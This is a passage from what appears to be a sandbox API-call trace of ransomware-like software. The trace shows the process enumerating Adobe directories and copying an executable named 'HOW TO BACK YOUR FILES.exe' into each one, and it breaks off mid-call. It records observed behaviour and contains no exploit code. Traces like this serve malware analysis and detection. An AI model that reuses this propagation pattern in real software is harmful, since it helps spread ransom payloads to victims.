lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI" [0057.256] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5fd0 | out: hHeap=0x2b0000) returned 1 [0057.256] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0057.256] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI") returned 55 [0057.256] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI" [0057.256] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.256] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fi_fi\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.260] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.260] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a1a980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a1a980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.261] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.261] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.261] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES" [0057.261] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5f58 | out: hHeap=0x2b0000) returned 1 [0057.261] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0057.261] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES") returned 55 [0057.261] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES" [0057.261] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.261] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\eu_es\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.266] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.266] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a40ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a40ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.267] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.267] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.267] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES" [0057.267] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0057.267] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0057.267] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES") returned 55 [0057.267] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES" [0057.267] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.267] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\es_es\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.272] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.272] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a40ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a40ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.272] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.272] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.272] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US" [0057.272] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3750 | out: hHeap=0x2b0000) returned 1 [0057.272] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0057.272] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US") returned 55 [0057.272] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US" [0057.272] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.272] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\en_us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.277] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.277] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a40ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a40ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.278] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.278] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.278] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE" [0057.278] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d36d8 | out: hHeap=0x2b0000) returned 1 [0057.278] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0057.278] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE") returned 55 [0057.278] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE" [0057.278] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.278] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\de_de\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.283] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.283] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a66c40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a66c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.283] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.283] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.283] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK" [0057.283] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8f30 | out: hHeap=0x2b0000) returned 1 [0057.283] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0057.283] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK") returned 55 [0057.283] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK" [0057.283] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.283] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\da_dk\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.288] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.288] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a66c40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a66c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.288] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.288] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.288] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ" [0057.288] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0057.288] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0057.288] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ") returned 55 [0057.288] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ" [0057.288] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.288] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\cs_cz\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.295] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.295] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\cs_CZ\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a66c40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a66c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.295] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.295] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.296] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES" [0057.296] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0057.296] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0057.296] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES") returned 55 [0057.296] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES" [0057.296] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.296] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ca_es\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.300] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.300] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ca_ES\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a8cda0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a8cda0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.301] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.301] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.301] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM" [0057.301] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1fc8 | out: hHeap=0x2b0000) returned 1 [0057.301] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0057.301] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM") returned 45 [0057.301] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM" [0057.301] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.301] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.306] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.306] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8386f760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a8cda0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a8cda0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.306] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.306] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.306] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0" [0057.306] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0057.306] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0057.306] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0") returned 49 [0057.306] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0" [0057.306] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.306] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.311] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.311] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8386f760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a8cda0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a8cda0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.311] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.311] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.312] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat" [0057.312] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc5b0 | out: hHeap=0x2b0000) returned 1 [0057.312] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0057.312] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat") returned 49 [0057.312] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat" [0057.312] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.312] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.317] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.317] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf1a9e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53ab2f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53ab2f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.317] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.317] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.317] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX" [0057.317] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0057.317] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0057.317] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX") returned 57 [0057.317] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX" [0057.317] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: 